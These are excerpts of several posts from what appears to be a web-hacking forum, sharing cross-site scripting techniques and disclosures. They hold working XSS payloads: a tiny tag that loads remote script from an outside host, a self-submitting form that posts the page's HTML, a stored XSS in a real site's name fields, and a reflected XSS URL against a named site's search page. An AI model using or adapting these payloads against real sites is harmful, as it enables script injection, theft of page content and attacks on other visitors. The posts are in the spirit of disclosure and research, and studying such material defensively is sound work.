script src for ie requires http:// for ie 7 as far as i can tell <script/src=http://t-t.am></script> :35 i like your method kuza, but its a in a "profile".. not in a GET string
Forum: XSS Info

i was "looking" at a site that had an unfiltered field in it, and you could put what ever you wanted. The problem was it was limited to 31 characters. <script src="http://"></script> was over my limit without a url <script src="http://" /> doesn't even work i do have control over other parts of the page but just <script>innerHTML</s
Forum: XSS Info

<form method=post action=post.php><input name=content><input type=image onerror="(f=this.form).content.value=f.parentNode.innerHTML;alert('xss');f.submit()"src=></form>
Forum: XSS Info

On evite.com when you create or edit an account your first and last name have no filtering at all. When you create and evite or reply to one your name is displayed for everyone :)...therefore xss on any evite you create or are invited to. I would give you a poc but i would have to invite you all to my party.. and I don't like you guys THAT much ;) ps: so much fun to play with the dom to ch
Forum: Full Disclosure

Hi everyone my name is Matt and I'm a recovering slacker...... I was referenced once in this blog post: http://ha.ckers.org/blog/20070310/my-lunch-with-samy/ but really didn't have much to say with those two in the room :p I really like how clean and pro the forum has been kept, and I am impressed by some of the names I see on here. Keep up the great work everyone.
Forum: Intro

WWW.com The XSS Starts Here http://www.www.com/search.php?q=%22%3E%3Cscript%3Ealert%28%27xss%27%29%3C%2Fscript%3E
Forum: Full Disclosure